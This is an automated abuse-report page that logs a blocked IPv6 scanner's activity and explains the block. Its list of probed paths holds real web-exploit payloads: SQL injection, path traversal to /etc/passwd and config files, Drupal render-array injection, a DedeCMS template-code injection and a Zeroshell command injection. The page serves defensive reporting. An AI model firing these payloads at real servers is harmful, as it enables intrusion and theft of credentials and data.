abuseip.org

IP 2a14:c380:90:63::a is currently blocked by the redirs.com anycast edge.

Reason: suspicious paths across 1 domains
Hits (last hour): 41
Unique targets hit: 1
Unique paths probed: 233
Detection count: 2
First seen: 2026-06-18 00:11:43 UTC
Last seen: 2026-06-18 01:11:59 UTC
Block expires: 2026-06-19 01:12:04 UTC

Sample paths probed

/tag_test_action.php?url=a&token&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md52022668164{/dede:field}
/assets/file:%2f%2f/etc/passwd
/admin/?n=language&c=language_general&a=doExportPack
/index.php?m=Goods&a=showcate&id=103%20UNION%20ALL%20SELECT%20CONCAT%28md5(205896311)%29%23
/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User&x509type=%27%0Aexpr%20925482631%20-%20889692473%0A%27
/webtools/control/xmlrpc
/index.php?s=Admin-Data-down&id=../../Conf/config.php
/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/
/solr/admin/cores?wt=json
/servlet/ShowImageServlet?imagePath=../web/fe.war/WEB-INF/classes/jdbc.properties&print
/?q=file%2Fajax%2Fname%2F%23value%2F{{build_id}}
/
/admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+41255*40211,1--+&site=admin
/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax
/index/ajax/lang?lang=../../application/database
/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd
/getcfg.php
/service.web
/?q=user/password&name[%23post_render][]=printf&name[%23type]=markup&name[%23markup]=hzyh%25%25epza
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd

Sample User-Agents

Mozilla/5.0 (X11; Linux x86_64; rv:116.0) Gecko/20100101 Firefox/116.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:116.0) Gecko/20100101 Firefox/116.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36

What does this mean?

This address sent traffic that the redirs.com edge classified as automated abuse — typically WordPress/PHP exploit scanning, credential file probing (.env, .git, .aws/), or mass-domain enumeration. The block is automatic and time-limited (24 hours from last detection).

If you believe this is a false positive, contact [email protected] with the IP and the timestamps above.